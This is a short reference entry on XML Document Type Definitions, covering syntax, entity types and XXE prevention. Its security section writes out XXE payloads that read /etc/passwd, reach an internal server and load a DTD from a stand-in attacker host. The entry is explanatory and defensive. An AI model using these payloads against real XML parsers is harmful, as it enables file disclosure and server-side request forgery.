Document Type Definition (DTD)

Document Type Definition (DTD) is a set of markup declarations that define the structure, elements, attributes, and entities of an XML document. DTDs can be internal (within the XML) or external (referenced via URL), and their entity features are the basis for XXE attacks.

DTD Syntax

<!-- Internal DTD -->
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ELEMENT root (child)>
  <!ELEMENT child (#PCDATA)>
  <!ENTITY greeting "Hello World">
]>
<root>
  <child>&greeting;</child>
</root>

<!-- External DTD reference -->
<!DOCTYPE root SYSTEM "http://example.com/schema.dtd">

Entity Types

• Internal Entity: <!ENTITY name "value">
• External Entity: <!ENTITY name SYSTEM "URI">
• Parameter Entity: <!ENTITY % name "value"> (used in DTD only)
• Public Entity: <!ENTITY name PUBLIC "id" "URI">

Security Implications

<!-- File read via external entity -->
<!ENTITY xxe SYSTEM "file:///etc/passwd">

<!-- SSRF via external entity -->
<!ENTITY xxe SYSTEM "http://internal-server/">

<!-- External DTD for blind XXE -->
<!ENTITY % ext SYSTEM "http://attacker.com/evil.dtd">
%ext;

Disabling DTDs

Most XXE prevention involves disabling DTD processing entirely or disabling external entities specifically in XML parser configuration.

See Also

• XML External Entity
• Blind XXE
• Billion Laughs Attack